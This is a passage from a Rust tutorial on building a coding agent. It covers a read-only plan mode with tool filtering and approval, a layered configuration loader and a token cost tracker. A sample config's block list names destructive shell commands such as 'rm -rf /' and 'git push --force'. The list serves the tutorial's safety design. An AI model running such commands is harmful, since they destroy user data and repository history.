read,glob,grep, and a user prompt, and it will happily spend ten turns exploring the codebase before producing any narrative output. There is no natural stopping gradient -- one moregrepis always plausible. Without a deliberate stopping signal, the plan phase drags on. - Plain-text stops are easy to mistake for partial work. A model that
ends a turn with "Next, I need to check how X is wired" is signalling
"I am still working" even when
stop_reason == Stop. The caller cannot easily distinguish a finished plan from a mid-thought pause.
exit_plan sidesteps both problems. It is a tool the model must actively
choose to call, which reads as an explicit commitment ("I am ready"). It
carries the plan text as its argument, so the plan and the stop signal arrive
in the same structured message. And because it lives in the same tool-call
slot the model is already used to, the behaviour composes naturally with the
rest of the loop. It is a social contract expressed as a tool schema.
When the model calls exit_plan, the loop detects it by name, pushes the
assistant message, finds the call's ID, and pushes a synthetic ToolResult
with "Plan submitted for review." The synthetic result is important -- the message
protocol requires every ToolCall to have a matching ToolResult. Skip it
and the next API call fails with a malformed request.
Phase 2: execute()
The execution phase is a standard agent loop with the full tool set. No
filtering, no virtual tools, no special termination. The execute() method
calls run_loop(messages, None, events) -- passing None for the allowed set
means all tools are available.
The key point: execute() receives the same &mut Vec<Message> that plan()
used. The message history from planning -- the system prompt, the user request,
the read-only tool calls, the plan text -- is all still there. The model enters
execution with full context of what it analyzed and what it decided to do. This
continuity is what makes the two-phase pattern effective. The model does not
start from scratch; it picks up where it left off.
Between plan() and execute(), the caller typically pushes a user message:
#![allow(unused)] fn main() { let (tx, _rx) = mpsc::unbounded_channel(); let plan = agent.plan(&mut messages, tx.clone()).await?; println!("Plan: {plan}"); // User approves messages.push(Message::user("Approved. Go ahead.")); let result = agent.execute(&mut messages, tx).await?; }
This approval message becomes part of the context for execution. The model sees it and knows it has permission to proceed with modifications.
Defense in depth: tool filtering
The plan phase uses two layers of protection to prevent write operations:
Layer 1: Definition filtering
The run_loop method filters the tool schemas sent to the model when an
allowed set is provided. Only tools whose names are in the set are included,
plus exit_plan.
If the model does not see a tool in its schema, it has no reason to call it. This is the primary defense -- remove the temptation.
Layer 2: Execution guard
Even if the model somehow requests a blocked tool (hallucination, prompt
injection, or a creative interpretation of the schema), the run_loop method
catches it. For each tool call, three things happen:
-
exit_planis handled specially -- When the model callsexit_plan, the loop returns the plan text immediately. A synthetic tool result is pushed so the message history stays valid. -
Blocked tools return errors -- If a tool is not in the
allowedset, the tool is not executed. Instead, an error string is returned to the model. The model sees this error, understands the constraint, and adjusts. -
Allowed tools execute normally -- Lookup, call, return result. The same pipeline as the SimpleAgent's tool execution.
Both layers must fail for a write operation to slip through during planning.
Key Rust concept: HashSet<&'static str> for zero-cost string sets
The read_only field uses &'static str rather than String. This means the set contains references to string literals that live for the entire program -- no heap allocation, no cloning. The 'static lifetime tells the compiler these strings never become invalid, which is always true for string literals like "read" or "bash". The trade-off is that you can only put compile-time-known strings into the set, not dynamically generated ones. For tool names, which are always known at compile time, this is the ideal choice.
The read_only set
The read_only field is a HashSet<&'static str> containing the tool names
allowed during planning. It is set via the read_only() builder method:
#![allow(unused)] fn main() { pub fn read_only(mut self, names: &[&'static str]) -> Self { self.read_only = names.iter().cloned().collect(); self } }
Unlike the reference implementation which can fall back to checking
is_read_only() flags on tools, the starter requires you to explicitly name
the allowed tools. This is simpler -- there are no is_read_only() or
is_destructive() methods on the Tool trait in the starter.
System prompt injection
The plan phase injects a system message to tell the model it is in planning
mode. This is handled by maybe_inject_plan_prompt():
#![allow(unused)] fn main() { fn maybe_inject_plan_prompt(&self, messages: &mut Vec<Message>) { // Don't inject if a system message already exists let has_system = messages .first() .is_some_and(|m| matches!(m, Message::System(_))); if !has_system { messages.insert(0, Message::System(self.plan_system_prompt.clone())); } } }
Three design decisions here:
-
Respect existing system prompts -- The method checks whether any
Message::Systemis already present at position 0. If the caller already set a system prompt (e.g., "You are a security auditor"), plan mode respects it rather than overwriting it. Ifplan()is called twice, the second call finds the existing message and skips injection. -
Position 0 -- The planning prompt is inserted at the beginning of the message list, before any existing messages. System prompts at position 0 have the strongest influence on model behavior.
-
Custom or default -- If
plan_prompt()was called on the builder, that text is used. Otherwise, the default tells the model it is in planning mode, should use read-only tools, and should callexit_planwhen done.
The full plan-execute flow
Let's trace through a realistic scenario to see how everything fits together. The user wants to copy a source file to a new location.
Setup:
#![allow(unused)] fn main() { let engine = PlanAgent::new(provider) .tool(ReadTool::new()) .tool(WriteTool::new()); let mut messages = vec![Message::user("Copy src.txt to dst.txt")]; }
Plan phase -- plan() injects the planning system prompt, filters
definitions to [read, exit_plan] (write is excluded), and enters the loop.
The model calls read(path="src.txt"), sees the contents, and returns
"I'll copy src.txt to dst.txt."
Approval -- The caller prints the plan and pushes a user message:
#![allow(unused)] fn main() { println!("Plan: {}", plan); messages.push(Message::user("Approved. Go ahead.")); }
Execute phase -- execute() exposes all tools. The model calls
write(path="dst.txt", content="source content"), the file is created on disk,
and the model returns "Done! Copied the file."
The message history at the end contains the complete trace: planning system prompt, user request, read-only analysis, plan text, approval, write operation, final confirmation. The model had full context at every step.
Event streaming: plan_with_events()
Like SimpleAgent, the PlanAgent has an event-streaming variant.
The plan/execute methods take an mpsc::UnboundedSender<AgentEvent> and emit
ToolCall, TextDelta, Done, and Error events as the phase runs.
The pattern mirrors run_with_events() from the agent module.
A TUI would use this to show a spinner while the agent reads files during
planning, display the plan text as it streams, and prompt the user for approval
before calling execute().
How Claude Code does it
Claude Code's plan mode follows the same two-phase pattern but integrates more deeply with the permission system.
| Feature | Our PlanAgent | Claude Code |
|---|---|---|
| Tool filtering | Explicit read-only set | PermissionMode::Plan flag |
| UI integration | Caller-driven (no built-in UI) | "Plan Mode" banner in TUI |
| Approval flow | Caller pushes user message | UI dialog with approve/reject |
| System prompt | Tagged plan_mode message | Mode-specific prompt section |
| Exit signal | exit_plan virtual tool | Mode transition in permission engine |
| Write blocking | Two layers (definitions + execution) | Permission engine rejects non-read-only |
The biggest difference is where the enforcement happens. In Claude Code, the
permission engine handles it -- plan mode is just another permission mode that
rejects non-read-only tool calls. The SimpleAgent does not need to know about
plan mode at all. Our approach is simpler and self-contained: everything about
plan mode lives in one struct, at the cost of less flexibility for "semi-plan"
modes that allow some writes but not others.
Tests
Run the plan mode tests:
cargo test -p mini-claw-code-starter plan
Key tests:
- test_plan_plan_text_response -- Plan phase returns text directly when the LLM responds with
StopReason::Stop. - test_plan_plan_with_read_tool -- Plan phase allows
readtool calls and returns the plan text. - test_plan_plan_blocks_write_tool -- Plan phase blocks
writetool calls, returns error to LLM, and verifies the file was not created on disk. - test_plan_plan_blocks_edit_tool -- Plan phase blocks
edittool calls and the original file remains unchanged. - test_plan_execute_allows_write_tool -- Execute phase permits writes and the file is created on disk.
- test_plan_full_plan_then_execute -- Complete two-phase flow: plan reads a file, execution writes to a new file.
- test_plan_message_continuity -- Message history grows correctly across plan and execute phases (system + user + assistant messages accumulate).
- test_plan_read_only_override -- Custom
read_only(&["read"])excludesbashfrom the plan phase. - test_plan_streaming_events_during_plan -- Plan phase emits
TextDeltaandDoneevents through the channel. - test_plan_exit_plan_tool -- The virtual
exit_plantool ends planning and injects a synthetic tool result. - test_plan_system_prompt_injected -- Plan phase inserts a
PLANNING MODEsystem message at position 0. - test_plan_system_prompt_not_duplicated -- Calling
plan()twice does not duplicate the system prompt. - test_plan_exit_plan_not_in_execute -- During execute,
exit_planis treated as an unknown tool. - test_plan_custom_plan_prompt -- Custom plan prompt replaces the default planning instructions.
- test_plan_full_flow_with_exit_plan -- End-to-end: read during planning, exit_plan, approve, write during execution.
Key takeaway
Plan mode is caller-driven separation of concerns: the agent analyzes with read-only tools first, the caller reviews and approves, then the agent executes with the full tool set. The same message history flows through both phases, giving the execution phase complete context from the planning phase.
Recap
Plan mode completes Part III -- Safety & Control. Over four chapters you built the layers that turn a reckless agent into a disciplined one:
- Chapter 13: Permission Engine -- Checks every tool call against permission rules before execution. Ask, allow, or deny based on the tool and the mode.
- Chapter 14: Safety Checks -- Static analysis of tool arguments. Catches dangerous patterns before the permission prompt appears.
- Chapter 15: Hook System -- Pre-tool and post-tool hooks for custom policies. Run linters after edits, block certain paths, enforce project rules.
- Chapter 16: Plan Mode -- A two-phase workflow that separates analysis from action. The agent reads and reasons first, then modifies only after approval.
The key architectural insight is caller-driven approval. The PlanAgent
does not prompt the user, display a dialog, or make assumptions about the UI.
It runs the plan, returns the text, and waits. The caller decides what to do
next. This separation of concerns -- engine logic vs. user interaction -- is
what makes the same PlanAgent work in a CLI, a TUI, a web interface, or a
test harness.
What's next
Part III gave your agent safety and control. Part IV -- Configuration -- builds the systems that make your agent project-aware:
- Chapter 17: Settings Hierarchy -- Layered configuration from global defaults to project-specific overrides.
- Chapter 18: Project Instructions -- Loading and assembling CLAUDE.md files that tell the agent how to work with this specific codebase.
The safety infrastructure you built in Part III protects the agent from doing harm. The configuration infrastructure in Part IV teaches it to do good.
Check yourself
← Chapter 15: Hooks · Contents · Chapter 17: Settings Hierarchy →
Chapter 17: Settings Hierarchy
File(s) to edit:
src/config.rs,src/usage.rsTests to run:cargo test -p mini-claw-code-starter config(Config, ConfigLoader),cargo test -p mini-claw-code-starter cost_tracker(CostTracker) Estimated time: 60 min
Your agent works. It reads files, writes code, runs commands, checks permissions, enforces safety rules, and restricts itself in plan mode. But every one of those behaviors is hardcoded. The model name is a string literal. The blocked commands list is baked into the source. The maximum context window is a constant. If you want to change any of them, you recompile.
Real tools do not work this way. A developer using Claude Code on a Rust project wants different settings than one working on a Python monorepo. A CI pipeline needs different defaults than an interactive session. A user who routes through a self-hosted proxy needs a different base URL. The agent must be configurable -- and the configuration must come from multiple sources, layered by priority, so that project settings override user settings, and environment variables override everything.
This chapter builds a 4-level configuration hierarchy and a cost tracker. By the end, both config (config) and cost_tracker (cost tracker) should pass.
cargo test -p mini-claw-code-starter config # Config, ConfigLoader
cargo test -p mini-claw-code-starter cost_tracker # CostTracker
Goal
- Define a
Configstruct with serde defaults so that partial TOML files deserialize into complete configurations. - Define a
ConfigOverlaystruct whose fields areOption<T>, so the loader can tell "field not set in the TOML" apart from "field explicitly set to the default value." - Implement the
merge()function with a single rule: everySome(_)in the overlay replaces the base. - Build
ConfigLoaderto assemble four layers (defaults, project config, user config, environment variables) in priority order. - Implement
CostTrackerto accumulate token counts and compute running cost estimates from per-million pricing.
Why layers?
A flat config file would be simple. One config.toml, one source of truth, done. But it breaks down immediately in practice:
- User preferences like model choice and API base URL should follow you across every project. You should not have to set
model = "anthropic/claude-sonnet-4-20250514"in every repository. - Project settings like blocked commands and protected file patterns are specific to one codebase. A node project might block
rm -rf node_moduleswhile a Rust project blockscargo publish --allow-dirty. - Environment overrides let CI pipelines inject settings without touching config files.
MINI_CLAW_MODEL=anthropic/claude-haiku-3-20250414in a GitHub Actions workflow switches to a cheaper model for automated checks. - Defaults provide sane behavior when nothing is configured at all.
The solution is layered configuration. Each layer can set any field. Higher-priority layers override lower ones. Fields not set in a layer fall through to the next one down.
Priority (highest to lowest):
1. Environment variables MINI_CLAW_MODEL, MINI_CLAW_BASE_URL, MINI_CLAW_MAX_TOKENS
2. User config ~/.config/mini-claw/config.toml
3. Project config .claw/config.toml
4. Defaults hardcoded in code
Claude Code uses the same approach. Its hierarchy goes: CLI flags > environment > user settings > project settings > defaults. The merge logic is more sophisticated -- it supports per-key overrides and array merging strategies -- but the architecture is identical.
flowchart TD
A["Config::default()"] -->|merge| B["Project config<br/>.claw/config.toml"]
B -->|merge| C["User config<br/>~/.config/mini-claw/config.toml"]
C -->|override| D["Environment variables<br/>MINI_CLAW_MODEL, etc."]
D --> E["Final Config"]
style A fill:#e8e8e8
style E fill:#c8e6c9
The Config struct
All configuration lives in a single Config struct at src/config/mod.rs:
#![allow(unused)] fn main() { use std::path::{Path, PathBuf}; use serde::{Deserialize, Serialize}; #[derive(Debug, Clone, Serialize, Deserialize)] pub struct Config { #[serde(default = "default_model")] pub model: String, #[serde(default = "default_base_url")] pub base_url: String, #[serde(default = "default_max_tokens")] pub max_context_tokens: u64, #[serde(default = "default_preserve_recent")] pub preserve_recent: usize, #[serde(default)] pub allowed_directory: Option<String>, #[serde(default)] pub protected_patterns: Vec<String>, #[serde(default)] pub blocked_commands: Vec<String>, #[serde(default)] pub instructions: Option<String>, } }
Eight fields spanning three categories: provider settings, safety settings, and agent behavior.
Provider settings
model identifies which LLM to use. The default is "anthropic/claude-sonnet-4-20250514" -- an OpenRouter model path. If a user routes through a different provider or wants a cheaper model for testing, they override this.
base_url is the API endpoint. The default points to OpenRouter (https://openrouter.ai/api/v1). Users running a local proxy, a corporate gateway, or a different OpenAI-compatible API change this to point at their endpoint.
max_context_tokens caps the context window at 200,000 tokens. A compaction engine would read this value to decide when to summarize old messages. Different models have different context limits -- Haiku supports 200K, but a self-hosted model might only handle 8K.
Safety settings
allowed_directory restricts file operations to a single directory tree. When set, the Write, Edit, and Read tools refuse to touch anything outside this path. This is a blunt but effective sandbox -- useful in CI where the agent should only modify the checkout directory.
protected_patterns is a list of glob patterns for files that cannot be written to. A project might protect *.lock files, .env, or Cargo.toml to prevent the agent from accidentally modifying build-critical files.
blocked_commands lists command substrings that the bash tool rejects. If any blocked substring appears in a command, execution is denied. This is the configuration surface for the safety checks from Chapter 14.
Agent behavior
preserve_recent controls how many recent messages the compaction engine preserves. When compacting, the engine summarizes older messages but keeps the most recent preserve_recent messages intact so the model has fresh context. The default of 10 keeps roughly the last 2-3 tool-use rounds.
instructions injects custom text into the system prompt. This is where project-specific guidance goes -- "always use async/await", "prefer Vec over slices in public APIs", "tests must use the mock provider". Chapter 18 builds the full instruction system; this field is the config hook for it.
Key Rust concept: #[serde(default)] for partial deserialization
Serde's default attribute is what makes partial config files work. When a TOML file omits a field, serde normally fails with "missing field." The #[serde(default = "function_name")] attribute tells serde to call the named function instead of failing. For fields that default to None or empty Vec, the simpler #[serde(default)] calls Default::default(). This pattern is idiomatic in Rust configuration: every field has a sensible default, and the user only specifies what they want to change. The alternative -- requiring every field in every config file -- would make partial configs impossible.
Default functions and the serde trick
Each field with a non-trivial default uses a named function:
#![allow(unused)] fn main() { fn default_model() -> String { "anthropic/claude-sonnet-4-20250514".into() } fn default_base_url() -> String { "https://openrouter.ai/api/v1".into() } fn default_max_tokens() -> u64 { 200_000 } fn default_preserve_recent() -> usize { 10 } }
The #[serde(default = "default_model")] attribute tells serde to call default_model() when the model field is missing from the TOML input. This is what makes partial config files work. A project config that only sets blocked_commands still deserializes into a full Config -- every omitted field gets its default.
Fields that default to "empty" (Option<String>, Vec<String>) use the simpler #[serde(default)] attribute, which calls Default::default() -- None for Option, empty Vec for collections.
The Default impl for Config mirrors these functions exactly:
#![allow(unused)] fn main() { impl Default for Config { fn default() -> Self { Self { model: default_model(), base_url: default_base_url(), max_context_tokens: default_max_tokens(), preserve_recent: default_preserve_recent(), allowed_directory: None, protected_patterns: Vec::new(), blocked_commands: Vec::new(), instructions: None, } } } }
Having both the Default impl and the serde defaults is intentional. Config::default() is used in code -- constructing a base config, comparing against defaults in the merge logic. The #[serde(default = "...")] attributes are used during deserialization. They must agree, and sharing the same named functions guarantees they do.
The overlay: telling "unset" from "set to default"
Before we can write the merge function, we need a way to answer a question that Config itself cannot answer: was this field actually set in the TOML file?
A natural first attempt is "compare the overlay value against Config::default() -- if it differs, it was set." That heuristic is wrong. It cannot distinguish two different situations:
- The user did not set the field in their TOML.
- The user did set the field, and the value they set happens to equal the default.
Case 2 is not hypothetical. If the default model is "anthropic/claude-sonnet-4-20250514" and the user explicitly writes model = "anthropic/claude-sonnet-4-20250514" in their user config to assert it regardless of project overrides, the comparison-to-default heuristic silently treats it as "not set" and keeps whatever the previous layer had. Last-write-wins is violated.
The fix is to encode "set" vs "not set" in the type system. We introduce a second struct -- ConfigOverlay -- whose fields are Option<T>. Serde deserializes a missing TOML key as None and a present one as Some(value). No value comparison needed.
#![allow(unused)] fn main() { #[derive(Debug, Clone, Default, Deserialize)] #[serde(default)] pub struct ConfigOverlay { pub model: Option<String>, pub base_url: Option<String>, pub max_context_tokens: Option<u64>, pub preserve_recent: Option<usize>, pub allowed_directory: Option<String>, pub protected_patterns: Option<Vec<String>>, pub blocked_commands: Option<Vec<String>>, pub instructions: Option<String>, } }
The struct-level #[serde(default)] tells serde to fall back to Default::default() for any field missing from the TOML input — and Default::default() for Option<T> is None. That is exactly the "key absent → None" mapping we want, and we get it without annotating every field individually.
The two structs play complementary roles. Config is the fully-resolved output: every field has a value, everyone downstream can read it without caring how it got there. ConfigOverlay is the transport format: a partial, optional view of the same shape, used only while merging layers.
Even Vec<T> fields become Option<Vec<T>>. This matters -- an overlay that sets protected_patterns = [] in TOML means "clear the list," which is different from "did not mention the list at all." An Option<Vec<T>> represents both cases cleanly; a bare Vec<T> cannot.
The merge logic
With the overlay in hand, merge becomes uniform: every Some(_) in the overlay replaces the corresponding field in the base, and every None leaves the base untouched.
#![allow(unused)] fn main() { pub fn merge(base: Config, overlay: ConfigOverlay) -> Config { Config { model: overlay.model.unwrap_or(base.model), base_url: overlay.base_url.unwrap_or(base.base_url), max_context_tokens: overlay.max_context_tokens.unwrap_or(base.max_context_tokens), preserve_recent: overlay.preserve_recent.unwrap_or(base.preserve_recent), allowed_directory: overlay.allowed_directory.or(base.allowed_directory), protected_patterns: overlay.protected_patterns.unwrap_or(base.protected_patterns), blocked_commands: overlay.blocked_commands.unwrap_or(base.blocked_commands), instructions: overlay.instructions.or(base.instructions), } } }
Two patterns cover every field:
unwrap_or(base.x)for fields whereConfigholds a concrete value (e.g.String,u64,Vec<String>). If the overlay hasSome(v), the result isv; otherwise the base value is kept..or(base.x)for fields that are alreadyOption<T>onConfig(allowed_directory,instructions).Option::orreturns the firstSome(_)it finds.
That is the entire merge. No value comparisons. No special cases per field. A later layer always wins when it sets a field, regardless of whether the value it sets matches the default, matches the previous layer, or is empty.
Collections: replace, not append
When an overlay does set protected_patterns or blocked_commands, its value fully replaces the base. Appending would mean every config layer adds to the list with no way to remove entries from a lower layer. Replacing gives each layer that mentions the field full control over its contents.
Consider a project that protects .env and .secret at the project level. If the user config also sets protected_patterns = [".credentials"], the replace strategy means only .credentials is protected -- the project patterns are gone. Since project config is loaded first (lowest priority among files) and user config is loaded second (higher priority), the user config's patterns replace the project's. For most settings this makes sense -- the user knows their environment better than the project author.
If you wanted append semantics, you would extend the collections instead:
#![allow(unused)] fn main() { // Append (not what we do): if let Some(extra) = overlay.protected_patterns { base.protected_patterns.extend(extra); } }
Claude Code supports both strategies depending on the field. Our implementation keeps it simple with replace-only, and the overlay's Option<Vec<T>> type is what lets "layer did not mention this field" stay distinct from "layer explicitly set it to an empty list."
ConfigLoader: assembling the layers
The ConfigLoader orchestrates the full merge pipeline:
#![allow(unused)] fn main() { pub struct ConfigLoader { project_dir: Option<PathBuf>, } impl ConfigLoader { pub fn new() -> Self { Self { project_dir: None } } pub fn project_dir(mut self, dir: impl Into<PathBuf>) -> Self { self.project_dir = Some(dir.into()); self } pub fn load(&self) -> Config { let mut config = Config::default(); // Layer 1: Project config (.claw/config.toml) if let Some(ref dir) = self.project_dir { let project_path = dir.join(".claw").join("config.toml"); if let Some(overlay) = Self::load_file(&project_path) { config = Self::merge(config, overlay); } } // Layer 2: User config (~/.config/mini-claw/config.toml) if let Some(user_dir) = dirs::config_dir() { let user_path = user_dir.join("mini-claw").join("config.toml"); if let Some(overlay) = Self::load_file(&user_path) { config = Self::merge(config, overlay); } } // Layer 3: Environment variables (highest priority) config = Self::apply_env(config); config } } }
The builder pattern lets callers optionally specify a project directory. In a real agent, this is the working directory where the user invoked the tool. In tests, it is a temp directory.
The load order matters
The load() method applies layers from lowest to highest priority:
- Start with
Config::default()-- the absolute baseline. - Merge the project config (
.claw/config.toml) -- project-specific overrides. - Merge the user config (
~/.config/mini-claw/config.toml) -- user-wide preferences. - Apply environment variables -- the ultimate override.
Each merge takes the current accumulated config as the base and the new layer as the overlay. Non-default overlay values replace the base. This means user config beats project config, and environment variables beat everything.
The dirs::config_dir() call uses the dirs crate to find the platform-appropriate config directory -- ~/.config on Linux, ~/Library/Application Support on macOS, %APPDATA% on Windows. This follows the XDG Base Directory Specification on Linux and platform conventions elsewhere.
Loading a single file
#![allow(unused)] fn main() { pub fn load_file(path: &Path) -> Option<ConfigOverlay> { let content = std::fs::read_to_string(path).ok()?; toml::from_str(&content).ok() } }
Two lines, two possible failure points, both handled with .ok()?:
- The file might not exist --
read_to_stringreturnsErr,.ok()converts toNone,?returnsNone. - The file might contain invalid TOML --
toml::from_strreturnsErr, same chain.
Notice the return type is Option<ConfigOverlay>, not Option<Config>. The loader deliberately parses into the partial type -- that is how merge later knows which fields the file actually mentioned.
Returning Option<_> instead of Result<_, Error> is a deliberate choice. Missing config files are not errors -- they are the normal case. Most users will not have a user config file. Most projects will not have a .claw/config.toml. The loader should silently skip missing files and apply defaults. Invalid TOML is arguably an error worth reporting, but for simplicity we treat it the same way. A production implementation would log a warning for parse failures while still falling back to defaults.
The toml crate handles deserialization. Because every field on ConfigOverlay is Option<T> with #[serde(default)], a TOML file that only sets one field still parses cleanly -- every other field becomes None:
# This is a valid config file:
model = "anthropic/claude-haiku-3-20250414"
This deserializes into a ConfigOverlay with model: Some(...) and every other field None. When merge applies it, only model is touched on the base.
Environment variable overrides
#![allow(unused)] fn main() { fn apply_env(mut config: Config) -> Config { if let Ok(model) = std::env::var("MINI_CLAW_MODEL") { config.model = model; } if let Ok(url) = std::env::var("MINI_CLAW_BASE_URL") { config.base_url = url; } if let Ok(tokens) = std::env::var("MINI_CLAW_MAX_TOKENS") { if let Ok(n) = tokens.parse::<u64>() { config.max_context_tokens = n; } } config } }
Environment variables are the simplest layer -- no files, no parsing, no merge logic. If the variable exists, its value replaces the field. If it does not exist, the field is untouched.
Only three fields have environment variable support: model, base_url, and max_context_tokens. These are the fields most commonly overridden in CI and scripting contexts. Safety fields like blocked_commands and protected_patterns are intentionally excluded from environment overrides -- you do not want a compromised environment variable to disable your safety rules.
Notice the double-parse for MINI_CLAW_MAX_TOKENS: first std::env::var to get the string, then .parse::<u64>() to convert it to a number. If the string is not a valid integer, the parse silently fails and the existing value is kept. No panic, no error message. This is the right behavior for environment variables -- a typo in MINI_CLAW_MAX_TOKENS=abc should not crash the agent.
CostTracker: knowing what you spend
Every LLM API call costs money. The cost depends on two factors: how many tokens you send (input) and how many tokens the model generates (output). Different models have wildly different pricing -- Claude Sonnet is roughly $3 per million input tokens and $15 per million output tokens, while Haiku is an order of magnitude cheaper.
A coding agent makes many API calls per session. A complex task might run 20-30 tool-use turns, each sending the full conversation history. Without tracking, you have no idea whether a session cost $0.02 or $2.00. The CostTracker accumulates token counts across a session and computes the running cost.
#![allow(unused)] fn main() { pub struct CostTracker { input_tokens: u64, output_tokens: u64, turn_count: u64, input_price_per_million: f64, output_price_per_million: f64, } }
Five fields. The first three are accumulators that grow with each API call. The last two are constants set at construction time based on the model's pricing.
Construction
#![allow(unused)] fn main() { impl CostTracker { pub fn new(input_price_per_million: f64, output_price_per_million: f64) -> Self { Self { input_tokens: 0, output_tokens: 0, turn_count: 0, input_price_per_million, output_price_per_million, } } } }
The caller provides pricing. For Claude Sonnet: CostTracker::new(3.0, 15.0). For Haiku: CostTracker::new(0.25, 1.25). This separates the tracker from model-specific knowledge -- it just counts tokens and multiplies by rates.
Recording usage
#![allow(unused)] fn main() { pub fn record(&mut self, usage: &crate::types::TokenUsage) { self.input_tokens += usage.input_tokens; self.output_tokens += usage.output_tokens; self.turn_count += 1; } }
Called after each provider response. The TokenUsage struct (from Chapter 4) carries the per-request token counts. The tracker accumulates them and increments the turn counter.
Note that record takes a reference to TokenUsage, not ownership. The caller typically has the usage attached to an AssistantTurn and should not have to give it up just to record costs.
Computing cost
#![allow(unused)] fn main() { pub fn total_cost(&self) -> f64 { let input_cost = self.input_tokens as f64 * self.input_price_per_million / 1_000_000.0; let output_cost = self.output_tokens as f64 * self.output_price_per_million / 1_000_000.0; input_cost + output_cost } }
Straightforward arithmetic. Input tokens times input price per million, divided by a million. Same for output. Add them together. The result is in USD.
For a session with 100 input tokens at $3/M and 50 output tokens at $15/M:
input: 100 * 3.0 / 1,000,000 = 0.0003
output: 50 * 15.0 / 1,000,000 = 0.00075
total: 0.00105
That is $0.00105 -- about a tenth of a cent. A typical interactive session costs $0.05-$0.50 depending on complexity and model choice.
Summary formatting
#![allow(unused)] fn main() { pub fn summary(&self) -> String { format!( "tokens: {} in + {} out | cost: ${:.4}", self.input_tokens, self.output_tokens, self.total_cost() ) } }
Produces a string like "tokens: 5000 in + 1000 out | cost: $0.0300". Four decimal places gives sub-cent precision. A TUI would display this in the status bar -- a constant reminder of what the session is costing.
Reset
#![allow(unused)] fn main() { pub fn reset(&mut self) { self.input_tokens = 0; self.output_tokens = 0; self.turn_count = 0; } }
Zeroes the accumulators but keeps the pricing. Useful when starting a new logical task within the same session, or for per-conversation cost tracking in a multi-conversation agent.
Accessor methods
The tracker exposes its accumulators through read-only methods:
#![allow(unused)] fn main() { pub fn total_input_tokens(&self) -> u64 { self.input_tokens } pub fn total_output_tokens(&self) -> u64 { self.output_tokens } pub fn turn_count(&self) -> u64 { self.turn_count } }
These let the UI and logging systems read the state without mutation. The fields themselves are private -- the only way to modify them is through record() and reset(), which keeps the accounting consistent.
Putting it together: a sample config file
Here is what a project's .claw/config.toml might look like:
model = "anthropic/claude-sonnet-4-20250514"
max_context_tokens = 100000
protected_patterns = [".env", "*.lock", "secrets/*"]
blocked_commands = ["rm -rf /", "git push --force"]
instructions = "Always run cargo fmt after editing Rust files."
And a user's ~/.config/mini-claw/config.toml:
model = "anthropic/claude-sonnet-4-20250514"
base_url = "https://my-proxy.example.com/v1"
When both exist, the loader merges them:
- Defaults -- all fields get their default values.
- Project config parses into a
ConfigOverlaywithSome(_)for exactly the keys the file mentions:model,max_context_tokens,protected_patterns,blocked_commands,instructions.mergeapplies each one to the base. - User config parses into an overlay with
Some(_)formodelandbase_url. Even though itsmodelvalue happens to equal the default, that no longer matters -- the overlay says the field was set, so it replaces the project's value.base_urllikewise replaces the default. - Environment -- if
MINI_CLAW_MODELis set, it overrides everything.
The final config has the project's safety rules, the user's model and proxy URL, and defaults for everything else. Each layer contributes what it knows without needing to repeat what it does not care about, and a layer is never silently ignored just because the value it set coincides with the default.
How Claude Code does it
Claude Code has a similar 4-level hierarchy: project settings, user settings, environment, defaults. The details differ in instructive ways.
Format. Claude Code uses JSON (settings.json, settings.local.json) rather than TOML. JSON is more familiar to web developers (Claude Code's primary audience) and integrates naturally with TypeScript. We use TOML because it is the Rust ecosystem standard -- every Rust developer already reads Cargo.toml daily.
Merge sophistication. Claude Code supports per-key override strategies. Some fields append (permission rules accumulate across layers), some replace (model name), and some use first-wins semantics (project instructions take precedence over user instructions for the same key). Our merge logic uses a single strategy: every field the overlay set replaces the base, collections included. Simpler, but it covers the common cases.
Cost tracking. Claude Code tracks costs per model with cache-aware pricing. When the API reports cache_read_tokens, those tokens are billed at a reduced rate (typically 90% cheaper than regular input tokens). Our CostTracker ignores caching -- it treats all input tokens the same. Adding cache-aware pricing would mean extending record() to accept cache_read_tokens and applying a separate rate, but the architecture does not change.
Validation. Claude Code validates settings on load -- unknown keys produce warnings, type mismatches produce errors. Our load_file silently drops unparseable files. A production implementation would validate and report.
Despite these differences, the layered architecture is the same. Settings flow from general (defaults) to specific (environment), each layer overriding the previous. The Config struct is the single source of truth for the entire agent, passed to every subsystem that needs to know how to behave.
Tests
Run the tests:
cargo test -p mini-claw-code-starter config # Config, ConfigLoader
cargo test -p mini-claw-code-starter cost_tracker # CostTracker
Note: Config and ConfigLoader tests are in config (following the V1
numbering where configuration was Chapter 16). CostTracker tests are in
cost_tracker (V1 token tracking chapter).
Key config tests (config):
- test_config_default_config --
Config::default()produces the expected model, token limit, and non-empty safety defaults. - test_config_load_from_toml -- A TOML string with
modelandmax_context_tokensdeserializes correctly. - test_config_default_fills_missing_fields -- A TOML file with only
modelstill gets defaults forpreserve_recent,instructions, etc. - test_config_load_nonexistent_path -- Loading from a non-existent path returns
Noneinstead of panicking. - test_config_mcp_server_config -- MCP server configuration round-trips through TOML correctly.
- test_config_hooks_config -- Hook configuration (command, tool_pattern, timeout) deserializes from TOML.
- test_config_env_override -- Setting
MINI_CLAW_MODELenvironment variable overrides the model in the loaded config. - test_config_protected_patterns_default -- Default config includes
.envand.git/**in protected patterns.
Key cost tracker tests (cost_tracker):
- test_cost_tracker_empty_tracker -- A new tracker starts at zero tokens, zero turns, zero cost.
- test_cost_tracker_record_single_turn -- Recording one turn increments input/output tokens and the turn counter.
- test_cost_tracker_accumulates_across_turns -- Three
record()calls accumulate totals correctly. - test_cost_tracker_cost_calculation -- 1M input + 1M output tokens at $3/$15 per million = $18.00.
- test_cost_tracker_cost_small_numbers -- 1000 input + 200 output tokens = $0.006.
- test_cost_tracker_summary_format --
summary()produces the expected"tokens: N in + N out | cost: $X.XXXX"format. - test_cost_tracker_reset --
reset()zeroes accumulators but preserves pricing.
Key takeaway
Layered configuration lets each level (defaults, project, user, environment) contribute only what it knows. Splitting the shape into a fully-resolved Config and a partial ConfigOverlay (fields are Option<T>) puts the "was this field set?" question in the type system: None means the file did not mention it, Some(v) means it did -- regardless of what v is. Merge then has a single rule: every Some(_) replaces the base.
Recap
This chapter built two subsystems that the rest of the agent depends on.
-
Configholds every configurable parameter in a single struct. Serde's#[serde(default)]attributes make partial TOML files work -- you only set what you want to change. -
ConfigOverlayis the partial counterpart toConfig: every field isOption<T>.Nonemeans the field was not set in the layer,Some(v)means it was -- and stays distinguishable from the default even whenvhappens to equal the default. -
ConfigLoaderimplements the 4-level merge pipeline: defaults, project config, user config, environment variables. Each file layer is parsed into aConfigOverlayand applied with a single rule: everySome(_)replaces the base. -
